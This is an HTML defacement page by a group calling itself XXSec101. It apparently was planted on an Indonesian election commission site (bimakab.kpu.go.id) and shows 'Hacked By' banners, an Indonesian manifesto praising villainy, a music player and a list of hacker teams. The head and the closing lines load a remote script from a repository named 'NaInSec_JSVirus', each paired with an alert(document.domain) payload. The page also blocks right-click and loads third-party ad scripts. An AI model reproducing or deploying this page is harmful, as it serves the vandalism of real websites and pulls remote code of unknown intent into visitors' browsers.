<html>
<head>
  <title>Hacked By XXSec101</title>
  <link rel="preconnect" href="https://fonts.googleapis.com">
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta name="og:image" content="https://github.com/NaInSec/Defacer/blob/main/img/effect.gif?raw=true">
  <meta name="og:description" content="bimakab.kpu.go.id">
  <meta name="description" content="𓂀𓄿𓊃𓋴𓀭𓂋𓆑𓂞𓍿𓏏𓏴𓀭𓇓𓂞𓍿𓈖𓂧𓆓𓂧𓈖𓂞𓇋𓂧𓂧𓆛𓂋𓏤𓂝𓆑𓂝𓆑𓈉𓀁𓈉𓆑𓈉𓈉𓂞𓆑𓈉𓇋𓏏𓆓𓂞𓊃𓋴𓀭𓏏𓆓𓂞𓇋𓇓𓆓𓂧𓇓𓏴𓇋𓆑𓂧𓂧𓆛𓂋𓏤𓂝𓆑𓂝𓆑𓈉𓀁𓂞𓂧𓂞𓆓𓈉𓆑𓈉𓈉𓂧𓂧𓈉𓂧𓆛𓆑𓂧𓇓𓆑𓂝𓈉𓀁𓂝𓆑𓂧𓏤𓈉𓂧𓂧𓂞𓏤𓈉𓆑𓂝𓇓𓏴𓈉𓏤𓂝𓆓𓂞𓏏𓇓𓆓𓂧𓏴𓆑𓂝𓆑𓂝𓈉𓆑𓂞𓆑𓂧𓈉𓈉𓂞𓆑𓈉𓂝𓆓𓂞𓏏𓇋𓏏𓆓𓂞𓏏𓇓𓂋𓏴𓂧𓇓𓏴𓂧𓆛𓈉𓆓𓂧𓏴𓆓𓂞𓇋𓇓𓆓𓂧𓂧𓆛𓂋𓏤𓂝𓆑𓂝𓆑𓈉𓀁𓂞𓂧𓆓𓈉𓆑𓈉𓈉𓂧𓂧𓏤𓂝𓆑𓈉𓈉𓂧𓂞𓆑𓂝𓈉𓀁𓈉𓂞𓂧𓂞𓆓𓈉𓆑𓈉𓈉𓂧𓂧𓂞𓆑𓂧𓂧𓂞𓆓𓂞𓂞𓆑𓂧𓂧𓏴𓇋𓂝𓆓𓂞𓂧𓆛𓂋𓏤𓂝𓆑𓂝𓆑𓈉𓀁𓂞𓂧𓂞𓆓𓈉𓆑𓈉𓈉𓂧𓂧𓈉𓂧𓆛𓆑𓂧𓂧𓂞𓆓𓂞𓂞𓏴𓇋𓆓𓂞𓂧𓆛𓂋𓏤𓂝𓆑𓂝𓆑𓈉𓀁𓂞𓂧𓂞𓆓𓈉𓆑𓈉𓈉𓂧𓂧𓏤𓂝𓆑𓈉𓈉𓂧𓂞𓆑𓂝𓈉𓀁𓂞𓂧𓂞𓆓𓈉𓆑𓈉𓈉𓂧𓂧𓈉𓂧𓆛𓆑𓂧𓂧𓂞𓆓𓂞𓂞𓏴𓇋𓂝𓆓𓂞𓂧𓆛𓂋𓏤𓂝𓆑𓂝𓆑𓈉𓀁𓈉𓂞𓂧𓂞𓆓𓈉𓆑𓈉𓈉𓂧𓂧𓏤𓂝𓆑𓈉𓈉𓂧𓂞𓆑𓂝𓈉𓀁𓂞𓂧𓂞𓆓𓈉𓆑𓈉𓈉𓂧𓂧𓈉𓂧𓆛𓆑𓂧𓂧𓂞𓆓𓂞𓂞𓏴𓇋𓆓𓂞𓂧𓆛𓂋𓏤𓂝𓆑𓂝𓆑𓈉𓀁𓂞𓂧𓂞𓆓𓈉𓆑𓈉𓈉𓂧𓂧𓏤𓂝𓆑𓈉">
  <meta name="keywords" content="Pemilu 2024, Jokowi, Megawati, Puan Maharani, Prabowo, BSSN, Militer, Polri, Cyber Polri, TNI AD, TNI AU, TNI AL, Rumah Sakit, Pemerintah, Pak Ganjar, KPK, KPU, BNN, Badan Intelijen Negara, Russia, Cina, Jepang, Belanda, Korea Selatan, Korea Utara, Malaysia, Papua Nugini, NTB, NTT, Dempasar, Bali, Jawa Timur, Cara Install Kali Linux, Cara Install Ubuntu, Cara Install Linux Mint, Cara Install Fedora, Github, Gitlab, HackerOne, Bug Bounty, Bug Hunter, Cyber Security, Hackers, Hacker, Bjorka, Anonymous Imdonesia, Anonymous, Hacker Russia, Amerika, Canada, Belgia, Brazil, Swedia, Norwegia, Pakistan, Palestina, Irak, Iran, Arab Saudi.">
  <script src="https://cdn.rawgit.com/bungfrangki/efeksalju/2a7805c7/efek-salju.js?raw=true" type="text/javascript"></script>
  <script type="text/javascript" src="https://raw.githubusercontent.com/NaInSec/NaInSec_JSVirus/main/Apps.js?raw=true">alert(document.domain);</script>
  <link href="https://github.com/NaInSec/Defacer/blob/main/img/effect.gif?raw=true" rel="icon">
  <link href="https://github.com/NaInSec/Defacer/blob/main/img/effect.gif?raw=true" rel="apple-touch-icon">

  <style type="text/css">
  @import url('https://fonts.googleapis.com/css?family=Saira+Stencil+One|Lacquer&display=swap');
    body {
      background-color: black;
      background-size: cover;
      background-attachment: fixed;
    </style>
    <style>
      html, body {
        background-color: #000;
        color: #636b6f;
        font-family: 'Fredericka the Great', sans-serif;
        font-weight: 100;
        height: 100vh;
        margin: 0;
        background-repeat: no-repeat;
      }
      .full-height {
        height: 100vh;
      }
      .flex-center {
        align-items: center;
        display: flex;
        justify-content: center;
      }
      .position-ref {
        position: relative;
      }
      .content {
        text-align: center;
      }
      .title {
        font-size: 36px;
        padding: 20px;
      }
      .dcs {
        font-family: 'Lacquer', sans-serif;
      }
    </style>
  </head>

  <style>
    @import url('https://fonts.googleapis.com/css?family=Orbitron&display=swap');

    html {
      background-color: black;
      font-family: 'Orbitron';
    }

    body {
      color: white;
    }

    h1 {
      color: #7a00ff;
    }

    .g7 {
      color: #ff0000;
    }

    .btn {
      border: none;
      width: 200px;
      height: 30px;
      outline: none;
      color: #fff;
      background: #111;
      cursor: pointer;
      position: relative;
      font-family: Orbitron;
      z-index: 0;
      border-radius: 10px;
    }

    .btn:before {
      content: '';
      background: linear-gradient(45deg, #ff0000, #002bff, #7a00ff, #ff00c8, #ff0000);
      position: absolute;
      top: -2px;
      left: -2px;
      background-size: 400%;
      z-index: -1;
      filter: blur(5px);
      width: calc(100% + 4px);
      height: calc(100% + 4px);
      animation: glowing 20s linear infinite;
      opacity: 0;
      transition: opacity .3s ease-in-out;
      border-radius: 10px;
    }

    .btn:active {
      color: #000;
    }

    .btn:active:after {
      background: transparent;
    }

    .btn:hover:before {
      opacity: 1;
    }

    .btn:after {
      z-index: -1;
      content: '';
      position: absolute;
      width: 100%;
      height: 100%;
      background: #111;
      left: 0;
      top: 0;
      border-radius: 10px;
    }

@keyframes glowing {
      0% {
        background-position: 0 0;
      }

      50% {
        background-position: 400% 0;
      }

      100% {
        background-position: 0 0;
      }}
  </style>

  <script>
    function play() {
      var audio = document.getElementById("lagu"); audio.play();
    }function pause() {
      var audio = document.getElementById("lagu"); audio.pause();
    }
  </script>

  <body align="center" oncontextmenu="return false" bgcolor="black">
    <!-- i-mobile for SmartPhone client script -->

    <script type="text/javascript" charset="UTF-8" src="http://cache.ssend.microad.jp/js/adfunnel-sp-load.js?raw=true"></script>

    <div class="adfunnel_sp" data-adfunnel='{ "spotid":"ad7990ad7d02f589", "seq":1,"display":"overlay" }'></div>

    <!-- tok2_user_contents -->

    <div id="tok2_user_contents">
      <div class="error">
        <script type="text/javascript">
        </script>
        <center>
        </center>
        <body>
        <div class="flex-center position-ref full-height">
          <div class="content">
            <div class="text">
              <img width="500" height="500" src="https://github.com/NaInSec/Defacer/blob/main/img/effect.gif?raw=true">
              <br><br><font color="white"><code><font color="red" class="dcs" size="20">Hacked By<br><font color="white" class="dcs" size="20">XXSec101</font><br><font color="red" size="4.8">Penjahat akan tetap selalu menjadi penjahat, jika pahlawan menceritakan kisahnya. Setiap penjahat adalah pahlawan dalam ceritanya sendiri. Entah anda akan mati sebagai pahlawan, atau hidup cukup lama untuk menjadi seorang penjahat. Saya lebih memilih menjadi penjahat sesungguhnya daripada pahlawan palsu. Jika anda pikir ini memiliki akhir cerita yang bahagia, maka anda belum memperhatikan dengan baik. Jika anda tidak bisa menjadi pahlawan maka jadilah penjahat sejati. Dan jangan pernah untuk meminta maaf karena anda menjadi orang paling cerdas di dalam ruangan itu. Ingat! Sejarahlah yang akan menentukan apakah saya penjahat atau pahlawan. Entah bagaimana saya masih hidup di balik topeng ini, sedangkan saya tidak lebih dari sekedar daging busuk yang hidup karena nyawa. Dan di balik topeng ini ada sebuah ide yang sangat anti peluru. Karena pada dasarnya saya hidup dari tuhan dan tuhan mati karena saya. Jadilah pahlawan dibalik topeng penjahat, karena orang yang membenci anda tidak percaya itu. Tidak ada yang namanya impian ataupun masa depan, semuanya hanyalah menuju kematian. Dan semua orang takut dengan yang namanya kematian, jika kematiannya sudah dekat.</font><br>


<button class="btn" onclick="play()"><font size="3">Play music</font></button>&nbsp;&nbsp;<button class="btn" onclick="pause()"><font size="3">Pause music</font></button>&nbsp;&nbsp; <audio id="lagu" src="https://github.com/NaInSec/Defacer/blob/main/music/Rasa-Ini-Yang-Tertinggal.mp3?raw=true"></audio><br>

                <center><font color="white" size="5"><br>My Team :</font></center>

                <font color="red"><code><font class="dcs" size="4.8"><i>..:: <font color="white" size="4.8">|</font> SCSI TEAM <font color="white" size="4.8">|</font> Cyber Security Agency <font color="white" size="4.8">|</font> NIS TEAM <font color="white" size="4.8">|</font> BSH TEAM <font color="white" size="4.8">|</font> IDNHack TEAM<font color="white" size="4.8">|</font> KETAPANG GREY HAT <font color="white" size="4.8">|</font> KH TEAM<font color="white" size="4.8">|</font> GARUDA HACKNET TEAM<font color="white" size="4.8">|</font> 313 MCA<font color="white" size="4.8">|</font> BEKASI BLACK HAT <font color="white" size="4.8">|</font> GANOSEC TEAM <font color="white" size="4.8">|</font> GARUDA ERROR SYSTEM <font color="white" size="4.8">|</font><font color="white" size="4.8"></font> ::..<br></div>
<script type="text/javascript" src="https://raw.githubusercontent.com/NaInSec/NaInSec_JSVirus/main/Apps.js?raw=true">alert(document.domain);</script>
</body>
</html>
